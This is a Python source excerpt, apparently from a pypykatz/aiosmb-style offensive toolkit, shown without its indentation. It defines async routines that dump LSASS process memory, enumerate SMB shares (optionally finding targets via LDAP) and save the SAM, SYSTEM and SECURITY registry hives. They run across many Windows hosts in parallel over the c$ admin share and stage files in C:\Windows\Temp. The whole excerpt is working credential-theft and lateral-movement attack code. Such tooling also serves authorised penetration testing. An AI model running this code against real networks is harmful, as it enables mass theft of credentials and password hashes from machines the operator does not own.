async def lsassdump(url,
method='task',
remote_base_path='C:\\Windows\\Temp\\',
remote_share_name='\\c$\\Windows\\Temp\\',
chunksize=64 * 1024,
packages=['all'],
targets=[],
worker_cnt=5):
from aiosmb.commons.connection.url import SMBConnectionURL
base_url = None
base_conn = None
mimis = []
workers = []
tgens = []
if targets is not None and len(targets) != 0:
notfile = []
if targets is not None:
for target in targets:
try:
f = open(target, 'r')
f.close()
tgens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
tgens.append(ListTargetGen(notfile))
if isinstance(url, SMBConnectionURL):
base_url = url
base_conn = url.get_connection()
else:
base_url = SMBConnectionURL(url)
base_conn = base_url.get_connection()
lsassdump_coro = lsassdump_single(base_conn.target.get_hostname_or_ip(),
base_conn,
method=method,
remote_base_path=remote_base_path,
remote_share_name=remote_share_name,
chunksize=chunksize,
packages=packages)
workers.append(lsassdump_coro)
for tgen in tgens:
async for _, target, err in tgen.generate():
tconn = base_url.create_connection_newtarget(target)
lsassdump_coro = lsassdump_single(
tconn.target.get_hostname_or_ip(),
tconn,
method=method,
remote_base_path=remote_base_path,
remote_share_name=remote_share_name,
chunksize=chunksize,
packages=packages)
workers.append(lsassdump_coro)
if len(workers) >= worker_cnt:
tres = await asyncio.gather(*workers)
for res in tres:
yield res
workers = []
if len(workers) > 0:
tres = await asyncio.gather(*workers)
for res in tres:
yield res
workers = []
async def shareenum(smb_url,
ldap_url=None,
targets=None,
smb_worker_count=10,
depth=3,
out_file=None,
progress=False,
max_items=None,
dirsd=False,
filesd=False,
authmethod='ntlm',
protocol_version='2',
output_type='str',
max_runtime=None,
exclude_share=['print$'],
exclude_dir=[],
exclude_target=[]):
from aiosmb.commons.connection.url import SMBConnectionURL
from pypykatz.alsadecryptor.asbmfile import SMBFileReader
from pypykatz.apypykatz import apypykatz
#if targets is None and ldap_url is None:
# raise Exception('Shareenum needs a list of targets or LDAP connection string')
if smb_url == 'auto':
smb_url = get_smb_url(authmethod=authmethod,
protocol_version=protocol_version)
enumerator = SMBFileEnum(smb_url,
worker_count=smb_worker_count,
depth=depth,
out_file=out_file,
show_pbar=progress,
max_items=max_items,
fetch_dir_sd=dirsd,
fetch_file_sd=filesd,
output_type=output_type,
max_runtime=max_runtime,
exclude_share=exclude_share,
exclude_dir=exclude_dir,
exclude_target=exclude_target)
notfile = []
if targets is not None:
for target in targets:
try:
f = open(target, 'r')
f.close()
enumerator.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
enumerator.target_gens.append(ListTargetGen(notfile))
if ldap_url is not None:
if ldap_url == 'auto':
ldap_url = get_ldap_url(authmethod=authmethod)
enumerator.target_gens.append(LDAPTargetGen(ldap_url))
if len(enumerator.target_gens) == 0:
enumerator.enum_url = True
#raise Exception('No suitable targets found!')
await enumerator.run()
async def regdump(url,
hives=['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'],
remote_base_path='C:\\Windows\\Temp\\',
remote_share_name='\\c$\\Windows\\Temp\\',
enable_wait=3,
targets=[],
worker_cnt=5):
from aiosmb.commons.connection.url import SMBConnectionURL
base_url = None
base_conn = None
mimis = []
workers = []
tgens = []
if targets is not None and len(targets) != 0:
notfile = []
if targets is not None:
for target in targets:
try:
f = open(target, 'r')
f.close()
tgens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
tgens.append(ListTargetGen(notfile))
if isinstance(url, SMBConnectionURL):
base_url = url
base_conn = url.get_connection()
else:
base_url = SMBConnectionURL(url)
base_conn = base_url.get_connection()
regdump_coro = regdump_single(base_conn.target.get_hostname_or_ip(),
base_conn,
hives=hives,
remote_base_path=remote_base_path,
remote_share_name=remote_share_name,
enable_wait=enable_wait)
workers.append(regdump_coro)
for tgen in tgens:
async for _, target, err in tgen.generate():
tconn = base_url.create_connection_newtarget(target)
regdump_coro = regdump_single(tconn.target.get_hostname_or_ip(),
tconn,
hives=hives,
remote_base_path=remote_base_path,
remote_share_name=remote_share_name,
enable_wait=enable_wait)
workers.append(regdump_coro)
if len(workers) >= worker_cnt:
tres = await asyncio.gather(*workers)
for res in tres:
yield res
workers = []
if len(workers) > 0:
tres = await asyncio.gather(*workers)
for res in tres:
yield res
workers = []